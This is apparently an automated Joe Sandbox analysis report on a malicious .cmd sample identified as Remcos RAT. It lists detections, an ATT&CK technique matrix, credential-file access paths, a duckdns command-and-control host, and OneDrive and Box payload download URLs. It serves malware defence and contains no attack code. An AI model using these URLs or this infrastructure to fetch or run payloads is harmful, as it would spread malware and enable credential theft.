Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		24_2_1455BB30
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: \key3.db		24_2_1455BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\Public\Libraries\sppsvc.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RFUXJL	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RFUXJL	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RFUXJL

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 3060, type: MEMORYSTR

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: cmd.exe

24_2_1455569A

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,	6_2_00007FF6658BE568
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,	6_2_00007FF6658A227C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,	6_2_00007FF6658C5648
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,	6_2_00007FF6658A54A0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	2 Native API	1 Scripting	1 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	1 Defacement
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	21 Access Token Manipulation	1 Install Root Certificate	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	1 Windows Service	1 Timestomp	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	22 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	45 System Information Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Bypass User Account Control	DCSync	1 Query Registry	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Masquerading	Proc Filesystem	131 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Virtualization/Sandbox Evasion	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	1 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	22 Process Injection	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\Mywiztwu.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\sppsvc.pif	100%	Joe Sandbox ML
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\easinvoker.exe	0%	Virustotal		Browse
C:\Users\Public\Libraries\netutils.dll	29%	ReversingLabs	Win64.Trojan.Zusy
C:\Users\Public\Libraries\netutils.dll	47%	Virustotal		Browse
C:\Users\Public\alpha.exe	0%	ReversingLabs
C:\Users\Public\alpha.exe	0%	Virustotal		Browse
C:\Users\Public\kn.exe	0%	ReversingLabs
C:\Users\Public\kn.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
dual-spov-0006.spov-msedge.net	0%	Virustotal		Browse
geoplugin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://ocsp.sectigo.com0C	0%	URL Reputation	safe
http://geoplugin.net/json.gpox.com	0%	Avira URL Cloud	safe
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP	0%	Avira URL Cloud	safe
https://%ws/%ws_%ws_%ws/service.svc/%ws	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpn.net/json.gp	0%	Avira URL Cloud	safe
37.duckdns.org	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpn.net/json.gp	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dual-spov-0006.spov-msedge.net	13.107.139.11	true	false	0%, Virustotal, Browse	unknown
embargogo237.duckdns.org	45.74.19.121	true	true		unknown
elmauz.box.com	74.112.186.144	true	false		high
public.boxcloud.com	74.112.186.128	true	false		high
geoplugin.net	178.237.33.50	true	false	4%, Virustotal, Browse	unknown
drive.google.com	142.250.101.102	true	false		high
drive.usercontent.google.com	142.250.101.132	true	false		high
elmauz.app.box.com	74.112.186.144	true	false		high
sf0kkw.by.files.1drv.com	unknown	unknown	false		high
onedrive.live.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?resid=BAF30C9243AC3050%21114&authkey=!ACfGQrCE2jZmaGY	false		high
https://elmauz.box.com/public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv	false		high
https://elmauz.app.box.com/public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv	false		high
http://geoplugin.net/json.gp	true	URL Reputation: phishing URL Reputation: phishing	unknown
https://elmauz.box.com/shared/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv	false		high
37.duckdns.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP	kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	false	Avira URL Cloud: safe	low
https://login.microsoftonline.com/%s/oauth2/authorize	kn.exe	false		high
https://sectigo.com/CPS0	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://login.microsoftonline.com/%s/oauth2/token	kn.exe	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://live.com/V	sppsvc.pif, 00000009.00000002.4103265846.0000000000735000.00000004.00000020.00020000.00000000.sdmp	false		high
https://public.boxcloud.com/d/1/b1	sppsvc.pif, 00000009.00000003.1723811939.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sf0kkw.by.files.1drv.com/y4mJD7T-efm99Mj7M3bDWK61C5J_9E0cWaFQ8_Sv_xuuCr4GLOJRyaqXhymO2SZPGok	sppsvc.pif, 00000009.00000002.4103265846.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/	kn.exe	false		high
http://geoplugin.net/json.gpn.net/json.gp	sppsvc.pif, 00000009.00000003.2527353506.000000000073D000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.0000000000746000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?resid=BAF30C9243AC3050%21114&authkey=	sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah	kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	false		high
http://geoplugin.net/json.gp/C	sppsvc.pif, 00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000019.00000002.2042016371.000000001447B000.00000040.00001000.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://geoplugin.net/json.gpox.com	sppsvc.pif, 00000009.00000003.2527353506.000000000073D000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sf0kkw.by.files.1drv.com/y4mvIQn78bXO0uvUkh3kArWIhM3caELUIcFjkkKi4lmUsvh-b99o_L_XVqpG75xc3fv	sppsvc.pif, 00000009.00000002.4103265846.0000000000728000.00000004.00000020.00020000.00000000.sdmp	false		high
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc	kn.exe	false		high
https://sf0kkw.by.files.1drv.com/	sppsvc.pif, 00000009.00000003.2527353506.0000000000764000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.0000000000764000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sf0kkw.by.files.1drv.com:443/y4mJD7T-efm99Mj7M3bDWK61C5J_9E0cWaFQ8_Sv_xuuCr4GLOJRyaqXhymO2SZ	sppsvc.pif, 00000009.00000002.4103265846.0000000000728000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pmail.com	sppsvc.pif, 00000009.00000003.1664121633.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, Mywiztwu.PIF, 00000018.00000002.1952084302.0000000002A7B000.00000004.00001000.00020000.00000000.sdmp	false		high
https://%ws/%ws_%ws_%ws/service.svc/%ws	kn.exe	false	Avira URL Cloud: safe	low
https://enterpriseregistration.windows.net/EnrollmentServer/device/	kn.exe	false		high
http://ocsp.sectigo.com0C	sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
74.112.186.144	elmauz.box.com	United States	33011	BOXNETUS	false
45.74.19.121	embargogo237.duckdns.org	United States	29802	HVC-ASUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
74.112.186.128	public.boxcloud.com	United States	33011	BOXNETUS	false
142.250.101.102	drive.google.com	United States	15169	GOOGLEUS	false
142.250.101.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430814
Start date and time:	2024-04-24 08:39:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	URGENTE_NOTIFICATION.cmd
Detection:	MAL
Classification:	mal100.rans.bank.troj.spyw.expl.evad.winCMD@41/21@9/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 211
Cookbook Comments:	Found application associated with file extension: .cmd Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-by-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, by-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, odc-by-files-geo.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:40:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mywiztwu C:\Users\Public\Mywiztwu.url
07:40:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mywiztwu C:\Users\Public\Mywiztwu.url
08:40:03	API Interceptor	6530876x Sleep call for process: sppsvc.pif modified
08:40:31	API Interceptor	2x Sleep call for process: Mywiztwu.PIF modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.139.11	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	VdwJB2cS5l.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	XY2I8rWLkM.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse
	ORDER-CONFIRMATION-DETAILS-000235374564.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	20240416-703661.cmd	Get hash	malicious	DBatLoader	Browse
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	disktop.pif.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
74.112.186.144	http://app.box.com/s/cf3xjx2mmpt2vnadnh2br5kbeknr6bvw	Get hash	malicious	Unknown	Browse	app.box.com/s/cf3xjx2mmpt2vnadnh2br5kbeknr6bvw
74.112.186.144	http://epperson-faucet.box.com/s/lp4wqkde4mmqr2iv2eltzf7ba6xv84l8	Get hash	malicious	HTMLPhisher	Browse	epperson-faucet.box.com/s/lp4wqkde4mmqr2iv2eltzf7ba6xv84l8
45.74.19.121	cf9dPUbn3C.exe	Get hash	malicious	Remcos	Browse
	3hHHxU2r9a.exe	Get hash	malicious	Remcos	Browse
	April_2024_discount_Voucher-Unique-d-File.cmd	Get hash	malicious	Unknown	Browse
	AprilDiscountVoucher.exe	Get hash	malicious	Quasar	Browse
	April_2024_discount_Voucher-Unique-d-File.bat	Get hash	malicious	Unknown	Browse
178.237.33.50	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	DHL Express Courier Pickup Confirmation CBJ231025122456.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Quotation.xls	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	BRUFEN ORDER VAC442_7467247728478134247.vbs	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	copy_76499Kxls.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
public.boxcloud.com	https://macnica.app.box.com/s/9ha197ji7wvjk2ju8z49clohea52x84v	Get hash	malicious	HTMLPhisher	Browse	74.112.186.128
	https://app.box.com/s/ufbcj0sgci60l323b31zkyzlvlhw9fgy	Get hash	malicious	Unknown	Browse	74.112.186.128
	https://spreadsheet1.box.com/shared/static/0qo7grqgmmzhuv5d3wzkqpttinlw9z34.xlsm	Get hash	malicious	Unknown	Browse	74.112.186.128
	http://app.box.com/s/cf3xjx2mmpt2vnadnh2br5kbeknr6bvw	Get hash	malicious	Unknown	Browse	74.112.186.128
	https://app.box.com/s/cf3xjx2mmpt2vnadnh2br5kbeknr6bvw	Get hash	malicious	Unknown	Browse	74.112.186.128
	https://app.box.com/s/cf3xjx2mmpt2vnadnh2br5kbeknr6bvw	Get hash	malicious	Unknown	Browse	74.112.186.128
	https://app.box.com/s/doa9ecl5wceqi0zm7w2bc9yolxqsb7c2	Get hash	malicious	HTMLPhisher	Browse	74.112.186.128
	https://app.box.com/s/pgfcvppkv909sguzt7kwjsxfaxju5ox7	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	74.112.186.128
	https://app.box.com/s/dp8w15m9nstvjx89ge2jlt12tppg4ztg	Get hash	malicious	HTMLPhisher	Browse	74.112.186.128
	https://app.box.com/s/otge5u7naei9idjterbtp8g9ws1dowz1	Get hash	malicious	Unknown	Browse	74.112.186.128
dual-spov-0006.spov-msedge.net	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.139.11
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	VdwJB2cS5l.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	pSfqOmM1DG.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.139.11
	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Get hash	malicious	PureLog Stealer, zgRAT	Browse	13.107.137.11
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
geoplugin.net	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL Express Courier Pickup Confirmation CBJ231025122456.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	BRUFEN ORDER VAC442_7467247728478134247.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	copy_76499Kxls.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50

ASNs

